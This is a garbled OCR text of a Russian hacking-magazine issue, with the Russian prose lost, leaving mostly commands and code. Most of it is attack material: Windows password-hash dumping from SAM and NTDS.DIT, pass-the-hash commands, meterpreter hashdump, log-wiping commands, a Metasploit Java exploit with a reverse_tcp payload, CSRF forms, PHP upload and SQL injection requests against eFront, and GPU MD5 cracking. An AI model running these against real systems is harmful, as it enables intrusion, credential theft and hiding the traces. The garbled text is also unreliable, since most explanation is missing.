Apple , Xcode iOS SDK (developer.
apple.com/devcenter/ios/index.action). ,
4 . ,
Apple (
AppStore,
). iOS Objective-C. PhoneGap, PhoneGap iOS.
(https://github.com/callback/phonegap/zipball/1.2.0),
iOS . , Xcode PhoneGap.
,
IDE -
document.addEventListener("deviceready", function () {
    new Notificator($("#map-canvas")[0]);
    // Show a native alert when the device has no network connection
    if (navigator.network.connection.type ===
        Connection.NONE) {
        navigator.notification.alert(" -",
            $.noop, TITLE);
    }
}, false);
, -. , . navigator.notification.alert
alert, , .
, network.
connection (bit.ly/uEyRwz) (bit.ly/tkvzE2).
:
document.addEventListener("touchmove", function (event) {
event.preventDefault();
}, false);
alert confirm ,
PhoneGap:
navigator.notification.confirm(' ?',
    function (button_id) {
        if (button_id === 1) { // OK
            self.removePoint(point);
        }
    }, TITLE);
UI-
jQuery Mobile , ,
. PhoneGap
,
(phonegap.com/tools): Sencha Touch, Impact, Dojo Mobile, Zepto.js .
, , , .
, ( ,
) ,
PhoneGap:
navigator.geolocation.watchPosition(function (position) {
self.movePerson(new gm.LatLng(
position.coords.latitude,
position.coords.longitude));
}, function (error) {
navigator.notification.alert(
'code: ' + error.code + '\nmessage: ' + error.message,
$.noop,
TITLE
);
}, {
frequency: 3000
});
, . Run ,
iOS-!
.
iPhone, iPod iPad , Xcode. .
:). :
PhoneGap, ,
. .
Appcelerator Titanium (www.appcelerator.com).
Titanium
Android iPhone, BlackBerry.
,
IDE. Titanium ,
( $49 ).
$120 . Appcelerator Titanium
, 25
.
Apache 2.
Corona SDK (www.anscamobile.com/corona).
iOS Android. . ,
OpenGL. , -
: $199 $349
iOS Android. Corona IDE .
Corona , JavaScript.
PhoneGap-
-
iOS
PhoneGap. Objective-C,
,
API PhoneGap. , Android Windows
Mobile 7, , -
, (
: phonegap.
com/start). ,
PhoneGap,
(phonegap.com/apps). PhoneGap
.
, ,
.
, HTML+JS -
, . , PhoneGap
Nitobi
( GitHub: github.com/
phonegap). ,
Nitobi Adobe.
, ? z
Ant (a.zhukov@real.xakep.ru)
WINDOWS-
WINDOWS-
, ,
,
,
NTLM.
.
.
?
, .
:
SAM-, LM/NTLM-
;
LSA, LM/NTLM- , ;
, MSCache-
, ( , ,
).
, AD-.
:
! , ,
. 7
.
PWDUMP
FGDUMP
,
. NTLM/LM-
.
, DLL-
SeDebugPrivilege. ,
( NT AUTHORITY\SYSTEM).
, :
,
( LiveCD), , Kon-Boot (www.piotrbania.com/all/kon-boot),
. ( NT AUTHORITY\
SYSTEM ),
EasyHack .
.
pwdump (www.foofus.net/~fizzgig/pwdump) fgdump (www.
foofus.net/~fizzgig/fgdump).
, . :
pwdump localhost
fgdump.exe
. 127.0.0.1.PWDUMP
( ) 127.0.0.1.CACHEDUMP
( ).
Windows-
,
, . , , pwdump, :
> pwdump -o mytarget.log -u MYDOMAIN\someuser -p \
'lamepassword' 10.1.1.1
10.1.1.1 , MYDOMAIN\
someuser , lamepassword , mytarget.log .
pwdump, fgdump ,
:
pwdump
hostfile.txt , , -T
10 .
,
( ).
, fgdump.exe.
VOLUME SHADOW COPY SERVICE
pwdump fgdump , , ,
. , .
,
SAM, , . ,
, SYSTEM.
,
, - . - ,
, ,
. , ,
, . , ,
Volume Shadow Copy Service ( ).
Windows XP Server 2003.
, , System
State ntbackup
(Volume Shadow Copy for Shared Folders).
,
( , SAM SYSTEM),
.
, Windows
, , .
,
. ,
, . HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Winlogon\cachedlogonscount 0.
, .
.
Windows
Credentials Editor (WCE)
, vssown.vbs
(tools.lanmaster53.com/vssown.vbs), .
.
: cscript vssown.vbs /start.
: cscript vssown.vbs /create.
: cscript vssown.vbs /list.
. Device object \\?\GLOBALROOT\
Device\HarddiskVolumeShadowCopy14 ( 14
). .
1. :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SAM .
2. , -
SAMInside (insidepro.com/rus/saminside.shtml)
.
, ,
,
! ,
. ,
SAM SYSTEM. Active Directory NTDS.DIT, :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\ntds\ntds.dit .
, SYSTEM. ,
? SYSTEM NTDS.DIT,
?
, , NTDS.DIT , .
Csaba Barta ,
NTDS.DIT .
csababarta.com/downloads/
ntds_dump_hash.zip. , .
BackTrack5 ( Linux-),
. ,
. libesedb:
cd libesedb
chmod +x configure
./configure && make
SAMInside
:
.
, :
cd esedbtools
./esedbdumphash ../../ntds.dit
/libesedb/esedbtools/ntds.dit.export/datatable.
. , SYSTEM:
cd ../../creddump/
python ./dsdump.py ../SYSTEM
../libesedb/esedbtools/ntds.dit.export/datatable
! !
, ( ).
, : python ./dsdumphistory.py
../system ../libesedb/esedbtools/ntds.dit.export/datatable.
, ,
( ).
HASHGRAB2 +
SAMDUMP2
, .
, ,
LiveCD (,
Offline NT Password & Registry Editor),
,
. HashGrab2 (py1337.get-root.com/tools/hashgrab2.
zip) samdump2 (sourceforge.net/projects/ophcrack/files/
samdump2/2.0.1),
LiveCD-. HashGrab2
Windows-, , samdump2
SAM SYSTEM.
METASPLOIT
, .
Meterpreter.
Metasploit Framework
. :
meterpreter > run post/windows/gather/hashdump
.
. Metasploit ,
. PsExec:
meterpreter > use exploit/windows/smb/psexec
SAMInside
insidepro.com/rus/saminside.shtml
,
NTLM-.
.
, .
,
Windows
.
lm2ntcrack
ighashgpu
www.xmco.fr/lm2ntcrack/index.html
www.golubev.com/hashgpu.htm
,
. NT, LM- .
, LM- ,
NT
. ,
, LM- ADMINISTRAT0R,
, , ,
lm2ntcrack.
. , - , .
ighashgpu
GPU MD4, MD5, SHA1, NTLM,
Oracle 11g, MySQL5, MSSQL. ,
.
Windows-
meterpreter >
meterpreter >
meterpreter >
]
meterpreter >
meterpreter >
meterpreter >
meterpreter >
, , . ,
. ,
getsystem. , MS09-012, MS10-015 (KiTrap0D) .
PASS-THE-HASH
NTLM .
,
.
:). , Pass The Hash,
1997 .
Pass-the-Hash Toolkit. (oss.
coresecurity.com/projects/pshtoolkit.html): IAM.EXE, WHOSTHERE.EXE
GENHASH.EXE. , GENHASH
LM- NT- . WHOSTHERE.
EXE, -, .
, :
, / NTLM- . IAM.
EXE
- ,
(, , . .),
,
,
.
,
NTLM-,
, .
:
whosthere.exe
;
iam.exe -h administrator:mydomain:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
.
, , ,
.
CUDA-Multiforcer
Cain&Abel NTML
( )
WINDOWS
CREDENTIALS EDITOR
. ,
- - :
wce.exe -s <username>:<domain>:<lmhash>:<nthash> \
-c <program>.
:
wce.exe -s user:Victim:1F27ACDE849935B0AAD3B435B51404EE:579110C49145015C47ECD267657D3174 -c "c:\Program Files\Internet Explorer\iexplore.exe"
, , . .
, (, )
, . z
ophcrack
ophcrack.sourceforge.net
www.cryptohaze.com/multiforcer.php
, .
,
nVidia. : MD5, NTLM, MD4, SHA1,
MSSQL, SHA, MD5_PS: md5($pass.$salt), MD5_SP:
md5($salt.$pass), SSHA: base64(sha1($pass.$salt)),
DOUBLEMD5: md5(md5($pass)), TRIPLEMD5, LM:
Microsoft LanMan hash .
Windows
rainbow-.
.
, , .
rainbow-. ,
,
.
NTLM-,
-. jumbo,
, NTLM.
diff',
, ( win32).
www.openwall.com
WINDOWS-?
. , , Windows-,
? . ,
? -,
.
. , ,
( nmap, - ),
.
ipconfig /all
ipconfig /displaydns
DNS-.
netstat -nabo
TCP/UDP-. -b ,
, .
netstat -s -p [tcp|udp|icmp|ip]
netstat -r
route print
.
.
, , 445.
net view
SMB ().
( '/domain',
). , ,
, . .
net accounts
( ).
, NetBIOS, , , , . .
net share
SMB-.
arp -a
ARP- .
type %WINDIR%\System32\drivers\etc\hosts
hosts.
.
: ( ), ,
, , . .
whoami
? .
'/all' SID , SID , (
?).
whoami /all
qwinsta
, , - . RDP- (
), .
ver
( uname ), , .
set
. SET ,
. USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .
systeminfo (XP+)
, , ,
, , .
qprocess *
, .
, ID , PID .
qappsrv
, .
csv, .
at
, , ,
. , SYSTEM ( Win7x64). , , BAT- do_something.bat
SYSTEM 15:41, :
at 15:41 /interactive "d:\pentest\do_something.bat"
, .
schtasks (XP+)
, . at,
schtasks ( ).
sc getkeyname "XXXXX"
sc queryex "XXXXX"
key name .
, PID .
tasklist (XP+)
PID
( ).
gpresult /z
- .
. , . ,
.
wevtutil el
, (, . .).
wevtutil qe <LogName>
wevtutil cl <LogName>
del %WINDIR%\*.log /a /s /q /f
WINDOWS.
Windows - . -
- .
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
, ,
Windows Vista SP1/7/2008/2008R2, , telnet ftp-..
%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
net use
,
. :
, , , (, ).
security . , , system.
SAM, .
( TargetIPaddr).
, REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead (: Data,
: REG_BINARY, : fe340ead).
, , .
, , C: sam_backup.dat?
, , , .
:
C: , .
WMIC
, ,
WMI (Windows Management Instrumentation).
, WMI- (WMIC): , , .
WMI
. , WMI- (computersystem, bios, ,
, baseboard) .
. .
: , MAC-, IP-,
.
wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status
, .
wmic path win32_product where "name = 'HP Software Update'" call Uninstall
HP Software Update.
, .
.
hacker .
hacker .
C: hacker .
- ( , ),
.
Windows.
,
(, ).
() .
/ EASY HACK
EASY
HACK
MITM RDP
-
. ,
. , ,
,
. ?
RDP,
.
.
:
,
Windows, XP 2000 ( ). ,
,
TLS. , , . 6- man-in-the-middle (MiTM),
,
, . , XP
,
. ,
RDP.
MiTM , , , , , , :).
MiTM RDP 6- :
0) ARP- DNS-. , .
1) .
2)
salt'. .
3) , .
4)
.
5) (
RC4).
, MiTM-. ,
. , MD5- ,
(. . ), .
,
.
, .
(goo.gl/7yADy). RDP MiTM, . - Cain&Abel (www.oxid.it):
Sniffer Scan MAC address.
ARP ARP .
.
: ,
, .
5) arp-poisoning.
1)
2)
3)
4)
JAVA
, Java, , . , Java
, Flash, ,
. ?
, Java , . javatester.org/
version.html .
,
. ? ,
-
CVE-2010-4452, . , Metasploit':
,
Java-.
, , ,
. ? ! :)
JavaScript,
Java-,
. , ,
(defcon-russia.ru/wall.txt).
SET (Social Engineer Toolkit).
BackTrack 5
(www.social-engineer.org). SET
, .
SET :
1) :
use exploit/windows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 80
3) :
set PAYLOAD java/meterpreter/reverse_tcp
4) :
exploit
exe-. ,
, Java.
, ? ?
? ? :) ,
, , , . ,
( :)),
. , - ,
. :
SMTP (25/TCP)
, Gmail Mail.ru.
, , , , ,
, -
. ?
150 . ,
IP.
3proxy (www.3proxy.ru), ,
. 3APA3A. , security.nnov.ru
,
, ,
. :)
( *), (
)
:
- .
,
. - 3proxy. ,
?
( ).
, , -
( www.example.com:25). ,
. , nmap
.
, UDP ICMP, TCP, TCP-ACK. ,
.
proxy p25
REVERSE-
, reverse. ? ,
-, () -
. ? . ,
reverse-
-, WAF
SSL-, , (,
). .
,
(,
- ?). .
reverse-
. ?
-. . , X-Forwarded-For,
, ! , HTTP
, .
(goo.gl/V0beW). HTTP,
RFC 2616 1.1, ,
Max Forwards. , , TRACE OPTIONS.
-
.
HTTP-traceroute. Squid
reverse- Wikipedia.org
,
, ,
. , GET POST,
. , TTL IP-.
,
- ,
HTTP- traceroute. , TRACE-
-,
RFC, GET
MaxForwards. traceroute,
, IP- .
:
HTTP-Traceroute.py -t www.victim.com
GET/POST)
- CSRF
reverse proxy
-m (TRACE/
. GET- . ,
POST?
:
<form name=passwd action=
"http://server.com/change_password.php" method="post">
<input type=hidden name="NP" value="new_pass">
<input type="submit">
</form>
<script>document.passwd.submit();</script>
! XML? XML-. :)
<form name=passwd ENCTYPE="text/plain"
action="http://server.com/change_password.php"
METHOD="POST">
<input type=hidden name='<?xml version'
value='"1.0"?><User><Password>new_pass</Password></User>'>
</form>
<script>document.passwd.submit();</script>
, , . ;).
(, , digital
forensics) ,
.
,
, .
, :
;
;
;
DLL- ;
;
;
;
Virtual Address Descriptor;
;
..
, , , ,
.
Volatility (goo.gl/Hi5ip). Python'
Windows ( XP), , 32-. , ,
. ,
.
(
), ,
. ,
, MoonSols DumpIt (http://goo.gl/BY1QN).
- :
. . , ,
( ,
USB).
, ? Volatility.
, Python', standalone-, .
, :
volatility.exe imageinfo -f d:\test.raw
:
imageinfo ;
-f d:\test.raw .
Volatility - . ;)
(WinXPSP3x86),
. , ?
:
volatility pslist -f d:\test.raw --profile=WinXPSP3x86
, , :
volatility netscan -f d:\test.raw --profile=WinXPSP3x86
- , ,
, SAM, -
LSA?
Windows .
volatility hivelist -f d:\test.raw --profile=WinXPSP3x86
hivelist ,
.
,
:
volatility hashdump -f d:\test.raw --profile=WinXPSP3x86
-y 0xe1035b60 -s 0xe1805b60
:
hashdump ;
-y 0xe1035b60 System;
-s 0xe1805b60 SAM.
, . ,
. ,
, . Volatility.
,
, .
(ivinside.blogspot.com)
(115612, . , .1)
. ,
, ,
, ,
.
CVSSV2
9.3
(AV:N/AC:M/AU:N/C:C/I:C/A:C)
BRIEF
: 5 2011 .
: Aniway, abysssec, sinn3r, juan vazquez.
CVE: CVE-2011-0105.
,
xlb Excel.
.
EXPLOIT
Excel ,
(, ).
xlb.
ajax_save_name.php
BIFF8.
,
. BIFF-
:
BOF Type = workbook globals
Workbook globals
...
EOF
BOF Type = worksheet
Sheet records
EOF
BOF Type = worksheet
Sheet records
EOF
...
ID ( )
, sz ( )
(sz )
(ID ) . .
: BOF (Begin Of File) EOF (End Of File).
BOF, :
0809H
0010H
0600H
****H
BOF-:
0005H Workbook globals
BOF 0xA7.
,
0x3C.
sub_30199E55.
. .
, ,
,
.
BOF, BIFF8
.
2
2
00
2
02
2
04
2
06
2
08
4
12
4
0006H
0010H
0020H
0040H
0100H
ID
ID
Excel,
.text:3053F830 call sub_301A0A01
.text:3053F835 cmp eax, 3Ch
.text:3053F838 mov [ebp+var_ED4], eax
.text:3053F83E jnz loc_30540488
.text:3053F844 call sub_301A0A01
.text:3053F849 mov ecx, [ebp+var_EDC]
.text:3053F84F imul ecx, [ebp+var_F00]
.text:3053F856 mov edi, eax
.text:3053F858 mov eax, [ebp+var_EE0]
.text:3053F85E lea ebx, [ecx+eax+3]
.text:3053F862 call sub_301A0ABE
.text:3053F867 push 0FFFFFFFDh
.text:3053F869 pop edx
.text:3053F86A sub edx, ecx
.text:3053F86C add eax, edx
.text:3053F86E push eax ; Dst
.text:3053F86F push ebx ; int
.text:3053F870 mov eax, edi
.text:3053F872 call sub_30199E55
, sub_30199E55 ,
. ,
.
CheckFile()
.text:30199E60
.text:30199E64
.text:30199E6A
.text:30199E6E
.text:30199E6F
.text:30199E75
.text:30199E76
.text:30199E7C
.text:30199E7D
...
.text:30199E93
.text:30199E97
.text:30199E98
.text:30199E9E
.text:30199E9F
.text:30199EA0
.text:30199EA2
.text:30199EA7
.text:30199EAB
.text:30199EAD
.text:30199EB0
.text:30199EB2
.text:30199EB8
PE-.
, .
, .
memcpy,
, /GS. ,
esp . ,
call esp.
TARGETS
, .
CVSSV2
7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
,
. ,
/GS /SAFESEH. , /GS
MS Visual Studio, , .
,
,
.
cookie,
.
64-
, ,
cookie. , ,
. . /SAFESEH
SEH- .
,
,
. ,
. Visual Studio
/SAFESEH
: 23 2011 .
: KiDebug.
CVE: CVE-2011-1985.
win32k.sys , . .
EXPLOIT
:
.text:BF9140C0 ; __stdcall NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
.text:BF9140C0 _NtUserfnINCBOXSTRING@28 proc near ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6E|p
.text:BF9140C0                                    ; NtUserMessageCall(x,x,x,x,x,x,x)+61|p ...
.text:BF9140C0
.text:BF9140C0 HWND   = dword ptr 8
.text:BF9140C0 arg_4  = dword ptr 0Ch
.text:BF9140C0 arg_8  = dword ptr 10h
.text:BF9140C0 arg_C  = dword ptr 14h
.text:BF9140C0 arg_10 = dword ptr 18h
.text:BF9140C0 arg_14 = dword ptr 1Ch
.text:BF9140C0 arg_18 = dword ptr 20h
,
BSoD:
.text:BF9140C0
.text:BF9140C0 mov edi, edi
.text:BF9140C2 push ebp
.text:BF9140C3 mov ebp, esp
.text:BF9140C5 mov ecx, [ebp+HWND] ; HWND == 0xffffffff (-1),
.text:BF9140C8 mov eax, [ecx+20h] ; BSOD
...
NtUserMessageCall NtUserfnINCBOXSTRING
, CB_ADDSTRING:
.text:BF80EE6B ; int __stdcall NtUserMessageCall(int, int, int UnicodeString, PVOID Address, int, int, int)
...
.text:BF80EEB1 push [ebp+arg_18] ; int
.text:BF80EEB4 movzx eax, ds:_MessageTable[eax]
.text:BF80EEBB push ecx ; int
.text:BF80EEBC push [ebp+arg_10] ; int
.text:BF80EEBF and eax, 3Fh
.text:BF80EEC2 push [ebp+Address] ; Address
.text:BF80EEC5 push [ebp+UnicodeString] ; int
.text:BF80EEC8 push [ebp+arg_4] ; int
.text:BF80EECB push esi ; int
.text:BF80EECC call ds:_gapfnMessageCall[eax*4] ; NtUserfnINSTRINGNULL(x,x,x,x,x,x,x)
...
.rdata:BF990D68 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28
.rdata:BF990D68 ; DATA XREF: NtUserMessageCall(x,x,x,x,x,x,x)
.rdata:BF990D68 ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D6C dd offset _NtUserfnNCDESTROY@28 ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D70 dd offset _NtUserfnINLPCREATESTRUCT@28 ; NtUserfnINLPCREATESTRUCT(x,x,x,x,x,x,x)
...
.rdata:BF990DD4 dd offset _NtUserfnINCBOXSTRING@28 ; NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
...
,
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);
SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);
CB_ADDSTRING          0x0143
CB_INSERTSTRING       0x014A
CB_FINDSTRING         0x014C
CB_SELECTSTRING       0x014D
CB_FINDSTRINGEXACT    0x0158
LB_ADDSTRING          0x0180
LB_INSERTSTRING       0x0181
LB_SELECTSTRING       0x018C
LB_FINDSTRING         0x018F
LB_FINDSTRINGEXACT    0x01A2
LB_INSERTSTRINGUPPER  0x01AA
LB_INSERTSTRINGLOWER  0x01AB
LB_ADDSTRINGUPPER     0x01AC
LB_ADDSTRINGLOWER     0x01AD
TARGETS
MS11-077, .
Wordpress
Zingiri Web Shop Plugin
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
WordPress
. , ,
.
-,
,
.
Egidio Romano aka EgiX . EgiX
13 , ,
.
EXPLOIT
/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php, 3756
.
$selectedDocuments POST- value.
$selectedDocuments
displayArray() writeInfo(), , $selectedDocuments. writeInfo(), /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php:
function writeInfo($data, $die = false)
{
$fp = @fopen(dirname(__FILE__) .
DIRECTORY_SEPARATOR . 'data.php', 'w+');
@fwrite($fp, $data);
if ($_POST['templateName']) {
$dir = '../../../../content/editor_templates/'.
$_SESSION['s_login'];
if (!is_dir($dir) && !mkdir($dir, 0755)) {
throw new Exception(_COULDNOTCREATEDIRECTORY);
}
$filename = $dir.'/'.$_POST['templateName'].'.html';
$templateContent = $_POST['templateContent'];
if(file_exists($filename) === false) {
$ok = file_put_contents($filename,
$templateContent);
chmod($filename, 0644);
GetUserTimeTarget()
! data.php,
-.
exploit-db.com (EDB-ID: 18111). PHP,
PHP.
,
, :
// Arch Linux
# pacman -S php
// Debian-based
# apt-get install php
:
$ php 18111.php <host> <path>
SOLUTION
2.2.4 .
2. . checkFile(), /libraries/filesystem.class.php, 3143-3154
. FileSystemTree::uploadFile(),
, checkFile() . , ,
file_black_list,
php, php3, jsp, asp, cgi, pl, exe, com,
bat.
php.
eFront
CVSSV2
7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
EgiX
eFront.
,
, .
EXPLOIT
1. .
/www/editor/tiny_mce/plugins/save_template/save_template.php
( 818):
POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1
Host: localhost
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

templateName=sh.php%00&templateContent=<?php evil_code(); ?>
3. SQL- UPDATE.
getUserTimeTarget(), /libraries/
tools.php: .
, package_ID,
$entity. , /www/
periodic_updater.php:
TARGETS
, file_put_contents() $_POST['templateName'] $_POST['templateContent'], . ,
, ,
php,
magic_quotes_gpc. ,
, :
if ($_SESSION['s_login']) {
$entity = getUserTimeTarget($_GET['HTTP_REFERER']);
//$entity = $_SESSION['s_time_target'];
//Update times for this entity
$result = eF_executeNew("update user_times set time=time+("
.time().
"-timestamp_now),timestamp_now="
.time().
"where session_expired = 0 and session_custom_identifier = '".
$_SESSION['s_custom_identifier'].
"' and users_LOGIN = '".
$_SESSION['s_login'].
"' and entity = '".
current($entity).
"'and entity_id = '".
key($entity).
"'");
, $_GET['HTTP_REFERER'], getUserTimeTarget(),
eF_executeNew(). ,
SQL- URL
:
http://localhost/efront/www/periodic_updater.php?
HTTP_REFERER=http://host/?package_ID=[SQL]
$_SERVER['HTTP_REFERER'], , -,
.
.
4. .
/www/index.php:
if (isset($_COOKIE['cookie_login'])
&& isset($_COOKIE['cookie_password']))
{
try {
$user = EfrontUserFactory :: factory(
$_COOKIE['cookie_login']);
$user -> login($_COOKIE['cookie_password'], true);
$_COOKIE['cookie_login'],
EfrontUserFactory::factory(),
,
:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login=admin;cookie_login=1;cookie_login=administrator;cookie_login=1;cookie_password=1
Connection: keep-alive
5. PHP-. /www/student.php:
if (isset($_GET['course']) ||
isset($_GET['from_course']))
{
if ($_GET['course'])
{
$course = new EfrontCourse($_GET['course']);
} else {
$course = new EfrontCourse($_GET['from_course']);
}
$eligibility = $course -> checkRules(
$_SESSION['s_login']);
, $_GET['course'] $_GET['from_
course'],
EfrontCourse, ,
eval():
/student.php?lessons_ID=1&course[id]=1&course
[directions_ID]=1&course[rules]=a:1:{s:19:"1];
phpinfo();die;/*";a:1:{s:6:"lesson";i:0;}}
TARGETS
MD5
(blog.chivavas.org)
INFO
WWW
ATI
Radeon HD 4850
X2
2,2
!
bit.ly/vEhdir
RainbowCrack
API.
MD5
.
bit.ly/vTSB9K
DVD
MD5.
, . -,
,
,
. , , MD5.
.
: , . ,
.
. - ( )
, . .
MD5.
MD5 1 2004 .
CertainKey Cryptosystems MD5CRK . -. 24 2004
, ,
MD5
, - . , 31 2008 NIST
. SHA1 SHA2.
BLAKE, Grøstl, JH,
Keccak Skein. .
I GHASHGPU: GPU
MD5-
. . ,
- : d8578edf8458ce06fbc5bb76a58c5ca4. Ighashgpu, www.golubev.com
.
.
, Ighashgpu GPU,
nVidia ATI c CUDA/
ATI Stream.
, CPU,
.
GPU ,
. , :
Windows:
ighashgpu.exe -t:md5 \
-h:d8578edf8458ce06fbc5bb76a58c5ca4 -max:7
MD5
, ,
.
IBM p690 (,
). :-) 2005
.
X.509 , .
, . 2006
. 2006 , !
. 2008
Chaos Communication Congress
X.509. MD5.
. 2007 , Sony PlayStation3 MD5. : 1,4 MD5- ! , 2009-, BlackHat
USA GPU ,
,
.
?
2011 IETF RFC 1321 (MD5)
RFC 2104 (HMAC-MD5). RFC 6151.
MD5
. ,
MD5. , MD5
, ,
,
, MD5.
.
- (qwerty).
, . d11fd4559815b2c3de1b685bb78a6283, , ,
_admin.
, :
ighashgpu.exe -h:d11fd4559815b2c3de1b685bb78a6283 -t:md5
-u:[abcdefghijklmnopqrstuwvxyz1234567890_] -m:??????_admin
'-u' , , '-m' .
,
_admin.
.
, -
.
,
. ,
. ,
,
. ,
, .
- , .
,
.
8- , 126
ASCII, 63 527 879 748 485 376 . 254
17 324 859
956 700 833 536, 2,7 ,
. , ,
. , , .
MD5
encrypted.dat
IGHASHGPU:
. ,
. , c00l:
f0b46ac8494b7761adb7203aa7776c2a
f2da202a5a215b66995de1f9327dbaa6
c7f7a34bbe8f385faa89a04a9d94dacf
cb1cb9a40708a151e6c92702342f0ac5
00a931d3facaad384169ebc31d38775c
4966d8547cce099ae6f666f09f68458e
encrypted.dat Ighashgpu
:
ighashgpu.exe -t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_]
-m:??????c00l encrypted.dat
Ighashgpu ighashgpu_results.txt :
f0b46ac8494b7761adb7203aa7776c2a:1rootxc00l
f2da202a5a215b66995de1f9327dbaa6:pwd12xc00l
c7f7a34bbe8f385faa89a04a9d94dacf:pwd34yc00l
cb1cb9a40708a151e6c92702342f0ac5:pwd56yc00l
4966d8547cce099ae6f666f09f68458e:pwd98zc00l
00a931d3facaad384169ebc31d38775c:pwd78zc00l
IGHASHGPU:
,
.
. 80- ,
, 640 10 ,
. ,
.
2003 , , ,
, -.
- .
.
, ,
- ( ,
64 ).
, .
. ,
. ,
. ,
. .
,
. ,
.
.
, .
.
. , :
.
RainbowCrack (project-rainbowcrack.com), Windows,
: 42151cf2ff27c5181bb36a8bcfafea7b.
Ighashgpu -asalt:
ighashgpu.exe -h:42151cf2ff27c5181bb36a8bcfafea7b \
-t:md5 -u:[abcdefghijklmnopqrstuwvxyz1234567890_] \
-asalt:s41t
RAINBOW TABLES
,
85-99%.
MD5
Linux. : LM/NTLM, MD5 SHA1. ,
- . MD5.
: , ,
. Free Rainbow
Tables (freerainbowtables.com). ,
, , .
3 MD5, SHA1, LM NTLM.
,
. : LM/NTLM, MD5
SHA1 200 .
.
rtgen, RainbowCrack. :
hash_algorithm (LM, NTLM, MD5
SHA1);
charset ,
charset.txt;
plaintext_len_min plaintext_len_max ;
table_index, chain_len, chain_num part_index
, (bit.ly/nndT8M).
:
1. table_index ,
. 0, .
2. chain_len .
3. chain_num .
4. part_index , .
( 0).
MD5:
rtgen.exe md5 loweralpha-numeric 1 7 0 2000 97505489 0
,
. Eee PC Intel Atom N450
:). md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt 1,5 .
,
.
rtsort.exe:
rtsort.exe md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt
!
. :
d8578edf8458ce06fbc5bb76a58c5ca4. rcrack_gui.exe
Add Hash... File.
OK. .
Search Rainbow Tables... Rainbow Table.
,
md5_loweralpha-numeric#1-7_0_2000x97505489_0.rt,
Open. !
.
.
.
MDCrack, CPU (
).
GPU (nVidia GeForce GT 220M), CPU (Intel Atom N450,
) :
Password length | GPU      | CPU      | Rainbow tables
4               | 00:00:01 | 00:00:01 | 00:00:16
5               | 00:00:02 | 00:00:09 | 00:00:16
6               | 00:00:16 | 00:05:21 | 00:00:10
7               | 00:07:11 | 09:27:52 | 00:00:04
, CPU , GPU .
,
,
. ,
, 4- 5- ,
.
,
. , .
.
-, ,
MD5 SHA1. - SHA2 SHA3
( ). -,
.
.
-,
. ,
100 %, . z
-
SPYEYE
.
.
,
.
, , . ,
,
SpyEye. -. ,
gribodemon Zeus, .
][ ,
SpyEye.
.
SpyEye
&C- ( SpyEye
Tracker)
,
.
.
WWW
bit.ly/tBYWgi
Google ;
SpyEyetracker.abuse.ch
SpyEye Tracker;
pastebin.com/
T0pUiEJp
;
bit.ly/sXe4PC
SpyEye ;
exploit-db.com
.
WARNING
.
,
,
.
SPYEYE
, SpyEye. . - (form grabbing),
webinjects (webinjects.txt)
( ) ,
. .
,
( , plugins).
DDoS,
RDP, SOCKS-, . .
( #10/2011
][).
( ). SpyEye TDL,
.
, 2009
,
, -
. Symantec, SpyEye
70 % Zeus ( ,
),
.
-, SpyEye
- .
- (C&C)
PHP, -
- . , - .
,
:
1. . ,
, PHP.
PHP-. , , PHP Bug
Scanner, Raz0r (bit.ly/tBFuwY).
crime kits .
SpyEye
SPYEYE
SpyEye Trojan Source Code Published!
.
- ?
, . ,
SpyEye .
,
Xylit0l, , ,
,
, .
, VMProtect,
SpyEye. , .
2. .
, , ,
Google Dorks ( ) .
3. .
Apache, MySQL, PHP ,
.
, ,
. .
,
1.0.2.
,
( frm_cards_edit.php):
Android.
Android.SpyEye.1. , SpyEye.
,
, ,
-. ,
- , ,
,
, -.
,
-. ,
, ,
NNNNNN. Android.SpyEye.1
,
.
: 251340.
-,
, .
$id_card = (int)$_GET['id'];
....
$id_card = $_GET['id']; if (!@$id_card) exit;
$dbase = db_open();if (!$dbase) exit;
$sql = ' SELECT cards.num, cards.csc, cards.exp_date,
cards.name, cards.surname, cards.address, cards.city,
cards.state, cards.post_code, country_t.name_country,
cards.phone_num, email_t.value_email '
. ' FROM cards, country_t, email_t'
. ' WHERE cards.fk_email = email_t.id_email'
. ' AND cards.fk_country = country_t.id_country'
. " AND cards.id_card = $id_card"
. ' LIMIT 0, 1';
$res = mysqli_query ($dbase, $sql);
....
Blind SQLi,
, $id_card
- . gribodemon
int, , ,
:
, gribodemon ,
:). .
, : BENCHMARK() SLEEP().
,
BENCHMARK()
.
SQLI
SQLi
r00tw0rm.com
Havij SQLi-. , frm_
